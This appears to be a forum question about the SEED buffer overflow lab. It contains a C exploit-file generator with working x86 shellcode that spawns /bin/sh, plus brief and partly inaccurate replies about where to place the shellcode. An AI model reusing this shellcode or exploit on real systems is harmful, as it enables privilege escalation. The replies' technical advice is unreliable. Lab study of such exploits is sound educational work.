# Buffer overflow lab problem

Tags: buffer-overflow, memory

Since our security course doesn't have a lab, i'm trying to solve the [Seed project's lab](http://www.cis.syr.edu/~wedu/seed/Labs_12.04/Software/Buffer_Overflow/) .

http://www.cis.syr.edu/~wedu/seed/Labs_12.04/Software/Buffer_Overflow/Buffer_Overflow.pdf

But there seems to be a problem ,
The code is not doing the exploit instead it's giving segmentation fault error  . 
Is there something else must be added to the code in order to make it functional ? 
The lab says that i have to edit the code below

```
/* A program that creates a file containing code for launching shell*/
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
char shellcode[]=

"\x31\xc0" /* xorl %eax,%eax */
"\x50" /* pushl %eax */
"\x68""//sh" /* pushl $0x68732f2f */
"\x68""/bin" /* pushl $0x6e69622f */
"\x89\xe3" /* movl %esp,%ebx */
"\x50" /* pushl %eax */
"\x53" /* pushl %ebx */
"\x89\xe1" /* movl %esp,%ecx */
"\x99" /* cdq */
"\xb0\x0b" /* movb $0x0b,%al */
"\xcd\x80" /* int $0x80 */
;
void main(int argc, char **argv)
{
char buffer[517];
FILE *badfile;
/* Initialize buffer with 0x90 (NOP instruction) */
memset(&buffer, 0x90, 517);
/* You need to fill the buffer with appropriate contents here */
/* Save the contents to the file "badfile" */
badfile = fopen("./badfile", "w");
fwrite(buffer, 517, 1, badfile);
fclose(badfile);
}
```

Comment: You need to copy the buffer `shellcode` into `buffer` after the comment `/* You need to fill the buffer with appropriate contents here */`.  I don't think it matters where in the buffer you place it.  The NOPs will execute before or after.

Answer (score 0):

Segmentation Fault usually happens when a buffer overflow occurs. You might want to try and debug your program, looking for memory adresses your buffer tries to access.

Should not you append the shellcode to the malicious buffer as well? (that is maybe what is intended by comments)